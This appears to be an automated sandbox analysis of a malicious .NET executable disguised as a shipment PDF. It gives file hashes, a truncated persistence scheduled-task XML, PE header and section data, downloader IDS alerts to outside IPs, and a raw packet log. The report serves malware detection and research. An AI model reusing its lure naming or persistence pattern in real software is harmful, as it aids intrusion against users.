                                                                                                                            Size (bytes):1594
                                                                                                                            Entropy (8bit):5.102543954957388
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLxxvn:cge7QYrFdOFzOzN33ODOiDdKrsuT7v
                                                                                                                            MD5:7BBD543C72679D7BFA194510F0063296
                                                                                                                            SHA1:4AD700FB88EFAD8B2E1F39BE1D4B9A63A7E1AD4E
                                                                                                                            SHA-256:0EF64E7F3C36200CE255C21AA94B7D70B3F45FE70437D5F3B061A311DBF549A0
                                                                                                                            SHA-512:2C867C1AA300A7FEC2DAB0E6FDDD501CA205DD694B76E1809A8EC39A2E2B84D0F09150F50416BD44D0AF527FA6826DF58C8021E230651A2716D0F84025056C08
                                                                                                                            Malicious:true
                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
                                                                                                                            Process:C:\Users\user\Desktop\Shipment 990847575203.pdf.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):827392
                                                                                                                            Entropy (8bit):7.714922075712128
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:jIC25usx+XtVUW1r4s7yy8FqY4uszmSpx0DzibplrdV26XyGnP/Ge/A:gx82VPFqY4usn0DzIVNXygPea
                                                                                                                            MD5:8626A0C350243B5390ABF5DEE2A40641
                                                                                                                            SHA1:8337486FBBECE35E03456500B23C5044466419C7
                                                                                                                            SHA-256:D16A272916C70064157E0CEF6770FF47ED874369E4DB36AE0A569DD85357EFCA
                                                                                                                            SHA-512:5B91943DB6E0B79FB6F776E4EB1337A54295688C09168EAD60EAE238B2BE51CDB64CE3518643624D569163E4FEE8A8E9CD374E0EDDD59E13C13F523EAFEC793D
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>Mg..............0..~... ........... ........@.. ....................................@.....................................O.......<............................................................................ ............... ..H............text....}... ...~.................. ..`.rsrc...<...........................@..@.reloc..............................@..B........................H...........H............T...G..........................................R.(......(.....(....*N..(....s....o....&*N..(....s....o....&*N..(....s....o....&*..(....*z.,..{....,..{....o......( ...*.0...........s!...}.....s"...}.....s"...}.....s"...}.....s"...}.....s#...}.....s#...}.....{....o$....($....{.....o%....{....o&...."...Bs'...o(...&.{....o)....{......o*....{....o)....{......o*....{....o)....{......o*....{....o)....{......o*....{....o)....{......o*....{....o)....{......o*.
                                                                                                                            Process:C:\Users\user\Desktop\Shipment 990847575203.pdf.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):26
                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                            Malicious:true
                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Entropy (8bit):7.714922075712128
                                                                                                                            TrID:
                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                            File name:Shipment 990847575203.pdf.exe
                                                                                                                            File size:827'392 bytes
                                                                                                                            MD5:8626a0c350243b5390abf5dee2a40641
                                                                                                                            SHA1:8337486fbbece35e03456500b23c5044466419c7
                                                                                                                            SHA256:d16a272916c70064157e0cef6770ff47ed874369e4db36ae0a569dd85357efca
                                                                                                                            SHA512:5b91943db6e0b79fb6f776e4eb1337a54295688c09168ead60eae238b2be51cdb64ce3518643624d569163e4fee8a8e9cd374e0eddd59e13c13f523eafec793d
                                                                                                                            SSDEEP:12288:jIC25usx+XtVUW1r4s7yy8FqY4uszmSpx0DzibplrdV26XyGnP/Ge/A:gx82VPFqY4usn0DzIVNXygPea
                                                                                                                            TLSH:4005F04532699907D6B687F00A31F1B81BFD6E99A902E3DB4EC66DDFB8E1F004950723
                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>Mg..............0..~... ........... ........@.. ....................................@................................
                                                                                                                            Icon Hash:5ba4a66a2a263095
                                                                                                                            Entrypoint:0x4c9d12
                                                                                                                            Entrypoint Section:.text
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x400000
                                                                                                                            Subsystem:windows gui
                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                            Time Stamp:0x674D3EA7 [Mon Dec 2 04:59:19 2024 UTC]
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:4
                                                                                                                            OS Version Minor:0
                                                                                                                            File Version Major:4
                                                                                                                            File Version Minor:0
                                                                                                                            Subsystem Version Major:4
                                                                                                                            Subsystem Version Minor:0
                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                            Instruction
                                                                                                                            jmp dword ptr [00402000h]
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xc9cc0          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xca000          0x1c3c        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xcc000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0xc7d18       0xc7e00   42a40af9d0073a3de206d8301ebc8191  False     0.8849561737804879  data       7.722678416773331    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xca000          0x1c3c        0x1e00    41233fcf7c005885ff8ba3b621cbece4  False     0.80546875          data       7.066333721484277    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xcc000          0xc           0x200     597ae62ac98f166b7cdc11701f231456  False     0.044921875         data       0.09800417566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size    Type                                                                               Language  Country  ZLIB Complexity
RT_ICON        0xca100  0x164f  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                                           0.951672211521625
RT_GROUP_ICON  0xcb760  0x14    data                                                                                                  1.05
RT_VERSION     0xcb784  0x2b8   COM executable for DOS                                                                                0.4511494252873563
RT_MANIFEST    0xcba4c  0x1ea   XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                        SID      Signature                                          Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
2024-12-14T13:49:38.000947+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.6  49719        158.101.44.242  80         TCP
2024-12-14T13:49:40.659005+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.6  49719        158.101.44.242  80         TCP
2024-12-14T13:49:42.279808+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.6  49722        172.67.177.134  443        TCP
2024-12-14T13:49:44.110337+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.6  49724        193.122.6.168   80         TCP
2024-12-14T13:49:45.721882+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.6  49726        172.67.177.134  443        TCP
2024-12-14T13:49:48.779919+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.6  49730        172.67.177.134  443        TCP
2024-12-14T13:49:49.672852+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.6  49731        193.122.6.168   80         TCP
2024-12-14T13:49:51.782215+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.6  49731        193.122.6.168   80         TCP
2024-12-14T13:49:53.407497+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.6  49736        172.67.177.134  443        TCP
2024-12-14T13:49:54.941404+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.6  49739        172.67.177.134  443        TCP
2024-12-14T13:49:55.032239+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.6  49740        193.122.6.168   80         TCP
2024-12-14T13:49:56.684295+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.6  49742        172.67.177.134  443        TCP
2024-12-14T13:49:59.996584+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.6  49747        172.67.177.134  443        TCP
2024-12-14T13:50:10.797902+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.6  49754        172.67.177.134  443        TCP
2024-12-14T13:50:30.404732+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.6  49767        172.67.177.134  443        TCP
                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Dec 14, 2024 13:49:21.737570047 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:21.750245094 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:21.762147903 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:21.762770891 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:21.774070024 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:21.858021975 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:21.881989956 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:21.882565975 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:21.894259930 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:21.904000044 CET4434971220.198.119.84192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:21.904087067 CET49712443192.168.2.620.198.119.84
                                                                                                                            Dec 14, 2024 13:49:21.904102087 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:21.909977913 CET49712443192.168.2.620.198.119.84
                                                                                                                            Dec 14, 2024 13:49:21.909991026 CET4434971220.198.119.84192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:21.910255909 CET4434971220.198.119.84192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:21.912962914 CET49712443192.168.2.620.198.119.84
                                                                                                                            Dec 14, 2024 13:49:21.913130999 CET49712443192.168.2.620.198.119.84
                                                                                                                            Dec 14, 2024 13:49:21.913139105 CET4434971220.198.119.84192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:21.913253069 CET49712443192.168.2.620.198.119.84
                                                                                                                            Dec 14, 2024 13:49:21.954050064 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:21.955333948 CET4434971220.198.119.84192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:21.988097906 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:22.074661016 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.074785948 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:22.079967976 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.080004930 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.080195904 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:22.096386909 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.096482992 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:22.109750986 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:22.114845037 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:22.115710974 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:22.126888037 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:22.150125027 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.230643034 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.235929966 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.236404896 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.247014046 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.303821087 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.344835997 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:22.353599072 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:22.428569078 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.428832054 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:22.433029890 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.433110952 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.433137894 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:22.441390991 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:22.442255020 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:22.443286896 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:22.461138964 CET4434971220.198.119.84192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.461386919 CET4434971220.198.119.84192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.461497068 CET49712443192.168.2.620.198.119.84
                                                                                                                            Dec 14, 2024 13:49:22.462255955 CET49712443192.168.2.620.198.119.84
                                                                                                                            Dec 14, 2024 13:49:22.462255955 CET49712443192.168.2.620.198.119.84
                                                                                                                            Dec 14, 2024 13:49:22.462277889 CET4434971220.198.119.84192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.473509073 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.542687893 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.542946100 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:22.561177969 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.561954975 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.563008070 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.573523045 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:22.693428993 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.734860897 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.758985996 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.759001017 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.759128094 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:22.780391932 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:22.789901972 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:22.807353020 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:22.885678053 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.900240898 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.904246092 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:22.909869909 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.927225113 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.952766895 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:22.953042984 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:22.956480026 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:23.070080042 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:23.076221943 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:23.103701115 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:23.107152939 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:23.121016026 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:23.121149063 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:23.124296904 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:23.191780090 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:23.194315910 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:23.244102955 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:23.266594887 CET49674443192.168.2.6173.222.162.64
                                                                                                                            Dec 14, 2024 13:49:23.266597986 CET49673443192.168.2.6173.222.162.64
                                                                                                                            Dec 14, 2024 13:49:23.268727064 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:23.268821001 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:23.271843910 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:23.294362068 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:23.297133923 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:23.358042955 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:23.391648054 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:23.416939020 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:23.436450958 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:23.440973997 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:23.486366034 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:23.489547014 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:23.583962917 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:23.584105968 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:23.587186098 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:23.594697952 CET49672443192.168.2.6173.222.162.64
                                                                                                                            Dec 14, 2024 13:49:23.609570026 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:23.612577915 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:23.670377016 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:23.670516014 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:23.673651934 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:23.732470989 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:23.776051044 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:23.779145002 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:23.838077068 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:23.850303888 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:23.850403070 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:23.853266954 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:23.899200916 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:23.924964905 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:23.928060055 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:24.198442936 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:24.198537111 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:24.201777935 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:24.299566984 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:24.299582958 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:24.299649000 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:24.300065041 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:24.300168037 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:24.300209999 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:24.313831091 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:24.314408064 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:24.315200090 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:24.315712929 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:24.318439007 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:24.318511963 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:24.362574100 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:24.434144974 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:24.434427977 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:24.435261011 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:24.435914040 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:24.516462088 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:24.519427061 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:24.631407022 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:24.631529093 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:28.836390972 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:28.836427927 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:28.836584091 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:28.839802980 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:28.840832949 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:28.960623980 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.022258043 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.025605917 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.032186985 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.032265902 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.032394886 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.032394886 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.034827948 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.034929037 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.154865026 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.166826010 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.166860104 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.166977882 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.170739889 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.172231913 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.292098045 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.347081900 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.350337029 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.356842995 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.356916904 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.357059002 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.357059002 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.359473944 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.359473944 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.479270935 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.487579107 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.487602949 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.487724066 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.491496086 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.492311001 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.612054110 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.671423912 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.674380064 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.674413919 CET4434970713.107.246.63192.168.2.6
                                                                                                                            Dec 14, 2024 13:49:29.674426079 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.675786972 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.681340933 CET49707443192.168.2.613.107.246.63
                                                                                                                            Dec 14, 2024 13:49:29.683497906 CET49707443192.168.2.613.107.246.63
